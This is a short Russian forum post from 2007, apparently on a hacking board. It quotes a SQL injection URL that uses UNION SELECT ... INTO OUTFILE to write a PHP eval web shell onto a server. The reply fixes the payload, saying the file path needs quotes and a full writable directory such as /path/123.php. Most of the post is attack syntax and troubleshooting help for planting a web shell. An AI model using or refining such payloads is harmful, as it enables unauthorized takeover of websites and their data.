05.08.2007, 21:13
|
|
Познающий
Регистрация: 05.08.2007
Сообщений: 30
Провел на форуме:
242062
Репутация:
18
|
|
Сообщение от s1mplec0de
http://server.com/index.php?id=1 union select 1,<?php eval($_GET[http://server.com/cmd.php]) ?>,3,4,5,6,7,8 into outfile 1.txt/*
Если я не ошибаюсь, то загрузка файла через sql происходит путем ... union+select+1,2,3,что будем загружать,5,6..+from+существующ ая таблица+into+outfile+ '/полный/путь/до/директории/для/записи/123.php'/*
Т.е. вы посто забыли поставить кавычки за прописать полный путь.
|
|
|